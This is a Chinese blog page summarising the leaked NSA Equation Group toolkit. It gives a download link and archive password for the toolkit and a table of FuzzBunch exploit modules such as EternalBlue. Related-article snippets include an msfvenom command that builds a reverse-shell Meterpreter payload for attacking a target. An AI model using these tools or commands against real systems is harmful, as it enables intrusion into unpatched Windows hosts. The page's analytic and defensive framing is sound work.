NSA方程式工具利用与分析

最新推荐文章于 2025-10-03 20:43:44 发布
原创 最新推荐文章于 2025-10-03 20:43:44 发布 · 2.1w 阅读 · 26 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#漏洞 #windows #NSA工具

本文详细介绍了NSA泄露的工具,重点关注了ETERNALBLUE漏洞的利用原理,提供了复现步骤,并讲解了后渗透攻击策略。同时,给出了检测和防御这些攻击的方法,包括关闭不必要的端口、安装补丁以及使用特定脚本进行检测。

下载地址https://yadi.sk/d/NJqzpqo_3GxZA4
解压密码:Reeeeeeeeeeeeeee
github下载地址https://github.com/misterch0c/shadowbroker

释放的工具总共包含三个文件夹,

  • Swift:包含了NSA对SWIFT银行系统发动攻击的相关证据,其中有EastNets的一些PPT文档、相关的证据、一些登录凭证和内部架构,EastNets是中东最大的SWIFT服务机构之一。
  • OddJob:包含一个基于Windows的植入软件,并包括所指定的配置文件和payload。适用于Windows Server 2003 Enterprise(甚至Windows XP Professional)
  • Windows:包含对Windows操作系统的许多黑客工具,但主要针对的是较旧版本的Windows(Windows XP中)和Server 2003。

主要工具

FUZZBUNCH:一款类似Metasploit的Exploit框架

模块 漏洞 影响系统 默认端口
Easypi IBM Lotus Notes漏洞 Windows NT, 2000 ,XP, 2003 3264
Easybee MDaemon WorldClient电子邮件服务器漏洞 WorldClient 9.5, 9.6, 10.0, 10.1
Eternalblue SMBv2漏洞(MS17-010) Windows XP(32),Windows Server 2008 R2(32/64),Windows 7(32/64) 139/445
Doublepulsar SMB和NBT漏洞 Windows XP(32), Vista, 7, Windows Server 2003, 2008, 2008 R2 139/445
Eternalromance SMBv1漏洞(MS17-010)和 NBT漏洞 Windows XP, Vista, 7, Windows Server 2003, 2008, 2008 R2 139/445
Eternalchampion SMB和NBT漏洞 Windows XP, Vista, 7, Windows Server 2003, 2008, 2008 R2, 2012, Windows 8 SP0 139/445
Eternalsynergy SMB和NBT漏洞 Windows 8, Windows Server 2012 139/445
Explodingcan IIS6.0远程利用漏洞
最低0.47元/天 解锁文章
[系统安全] 二十六.WannaCry勒索病毒分析 (2)MS17-010漏洞利用及蠕虫解析
杨秀璋的专栏
03-01 9345
作者前文采用Github资源实现永恒之蓝漏洞加载WannaCry勒索病毒,并实现对Win7文件加密的过程,但过程较为复杂,为什么不直接利用永恒之蓝呢?所以,这篇文章将直接分享MSF利用MS17-010漏洞进行反弹Shell,再上传勒索病毒进行实验复现,并详细讲解WannaCry勒索病毒的原理。基础性文章,希望对您有所帮助。
railgun渗透工具使用说明书-1.3.81下载仓库
gitblog_06769的博客
05-08 479
railgun渗透工具使用说明书-1.3.81下载仓库 【下载地址】railgun渗透工具使用说明书-1.3.81下载仓库 Railgun是一款专为64位系统设计的高效渗透工具,集安全性便捷性于一体。它配备了启动密码,确保工具使用的安全性,同时通过托盘操作功能,用户可轻松管理程序,即使关闭主窗口也能继续运行。Railg...
方程式工具包Linux,NSA工具包验证之SMB漏洞利用
weixin_31446915的博客
05-05 984
验证环境:攻击机1(本次演示IP:172.16.11.2):windows系统,安装python2.6.6, pywin32-221.win32-py2.6.exe, xshell, xftp, 下载方程式工具包放到C盘,在工具包目录下的windows目录新建文件夹”listeningposts”,并且开放所有端口关闭防火墙,确保内网可以访问之攻击机2(本次演示IP:172.16.12.2):ka...
一文通透Native Sparse Attention(简称NSA)——动态分层下的“原生稀疏注意力”策略:将粗粒度的token压缩细粒度的token选择相结合
最新发布
结构之法 算法之道
10-03 4885
DeepSeek团队联合北大、华盛顿大学提出全新注意力机制NSA,通过硬件对齐和可训练稀疏性解决长序列处理难题。NSA采用层次化token建模,结合压缩、选择和滑动窗口三种路径,在保持性能的同时显著降低计算量。相比传统方法仅在推理阶段应用稀疏性,NSA实现端到端训练,并兼容现代高效解码架构。实验表明,NSA在64k上下文处理中计算量减少7.88倍,获ACL2025最佳论文,其改进版DSA已应用于DeepSeekV3.2-Exp模型。该研究为大模型长上下文处理提供了高效解决方案。
railgun渗透工具使用说明书-1.3.81
08-04
1. 程序简介 1. 工具为64位程序 2. 工具设置有启动密码密码请联系作者 3. 工具设有托盘,关闭窗口不会关闭程序,需通过托盘操作 4. 如程序出现问题
gorailgun-1.4.4beta1
06-08
gorailgun-1.4.4beta1 railgun网络渗透工具 密码为:railgun
railgun:通过代码来简单说明
easy_mind的博客
11-24 3674
在说明之前我先展示一下我的工程目录层级,因为我连github有点慢,所以像protoc.exe这样上了1M的文件就不传了。所以如果从github上获取源码的同学可能还需要再去我的百度云盘上获取build.bat和protoc.exe。百度云盘链接:http://pan.baidu.com/s/1dFebn25 密码:oq2h,当然用linux的同学需要自己再另外获取protoc和自己写build
NSA的各种***工具
weixin_33674976的博客
10-24 351
这些工具代号都来自斯诺登的泄密文件:几乎各种信息收集手段都有,从电磁信号手机、屏幕信息收集,植入工具收集,到栅格电脑屏幕的光学收集、硬盘镜像,打印机数据窃听,USB无线网桥,以太网包双向注入工具,不一而足。HIGHLANDS: Collection from ImplantsVAGRANT: Collection of Computer ScreensMAGNETIC: Sensor Collec...
利用NSA方程式工具—“永恒之蓝”攻陷一台计算(MS17-010)
热门推荐
weixin_38948797的博客
01-27 2万+
利用方程式工具—“永恒之蓝”攻陷一台计算(MS17-010)  (注:本文章仅供技术交流和学习,请勿用于非法用途)     相信17年最大的安全事件比特币勒索病毒Wanncary没几个人不知道吧。那么究竟比特币勒索病毒究竟是怎么一回事呢?所谓比特币勒索病毒即:永恒之蓝漏洞利用程序+Wannacry勒索软件程序,也正是这两个武器造就了迄今为止最巨大的网络攻击勒索事件,影响到近百个国家上千家企业及
精选资源
Bvp47美国NSA方程式的顶级后门
12-26
【Bvp47美国NSA方程式的顶级后门】是一种高级网络攻击工具,由美国国家安全局(NSA)的“方程式组织”所开发。该后门在2013年被奇安盘古实验室的研究人员首次发现,当时它在某国内要害部门的Linux平台上被用于复杂的...
ShadowBrokers方程式工具包浅析
BaymaxJW的博客
01-23 2685
一、解密后的工具包: 其中Windows目录包括Windows利用工具和相关攻击代码,swift目录中是银行攻击的一些证据,oddjob目录是植入后门等相关文档。 Windows目录:(包含了各种漏洞利用工具,在exploits中包含了丰富的漏洞利用工具,可影响windows多个平台) 三个比较重要的文件:exploits,fuzzbunch,specials A:exploits...
NSA武器库工具泄漏对网络安全的影响.pdf
09-20
此外,黑客组织“影子经纪人”从NSA下属的“方程式组织”窃取的文件中,包括了针对微软Windows系统和SWIFT系统的攻击工具。文档还提及了其他几种攻击工具,例如永恒王者、永恒浪漫、翡翠纤维等。这些工具的共同特点...
永恒之蓝ms17_010方程式漏洞利用工具.rar
12-03
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.***.*** LPORT=4**** -f dll > x64.dll,reverse或者bind方式,替换到目录下,执行第一个检测安装backdoor,第二个选项卡attack就可以了。方式可以直接打靶机,可以上传到跳板机执行。
方程式445漏洞检测
11-12
方程式445批量检测工具(MS17-010) 全自动极速版。仅限于检测,请勿非法使用。
gorailgun渗透工具
08-03
gorailgun渗透工具
gorailgun-1.3.8.zip
11-01
gorailgun最新版整理,懂的都知道,用过的都说好
NSA方程式泄漏工具包浅析
weixin_34117211的博客
09-19 1045
本文讲的是NSA方程式泄漏工具包浅析,前日,臭名昭著的方程式组织工具包再次被公开,TheShadowBrokers在steemit.com博客上提供了相关消息。据此,腾讯云鼎实验室对此进行了分析。本次被公开的工具包大小为117.9MB,包含23个黑客工具,其中部分文件显示NSA曾入侵中东SWIFT银行系统,工具包下载接见文后参考信息。 解密后的工具包:...
方程式 Eternalblue 漏洞利用复现
VinK1的博客
04-19 6749
漏洞原理详细的漏洞原理参照文章: http://www.91ri.org/16946.html 懒得点连接的大人们可以看这里: 首先SrvOs2FeaListToNt首先调用SrvOs2FeaListSizeToNt计算pNtFea的大小。这里注意了SrvOs2FeaListSizeToNt函数会修改原始的pOs2Fea中的Length大小,本来Length是一个DWORD, 代码还强制转换
第89篇:方程式工具包远程溢出漏洞图形界面版V0.3(内置永恒之蓝、永恒冠军、永恒浪漫等)...
ABC_123的博客
03-09 1037
Part1 前言大家好,我是ABC_123。我从年前到现在,一直在整理曾经写过的红队工具,逐步把自己认为比较好用的原创工具发出来给大家用一用,方便大家在日常的攻防比赛、红队评估项目中解放双手,节省时间精力和体力。本期给大家分享的就是我在2018年左右编写的方程式工具包的各种溢出漏洞的图形界面版,个人一直在更新,一直在用。注:方程式工具包的针对windows系统的各种溢出漏洞,有很多使用技巧,所...
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值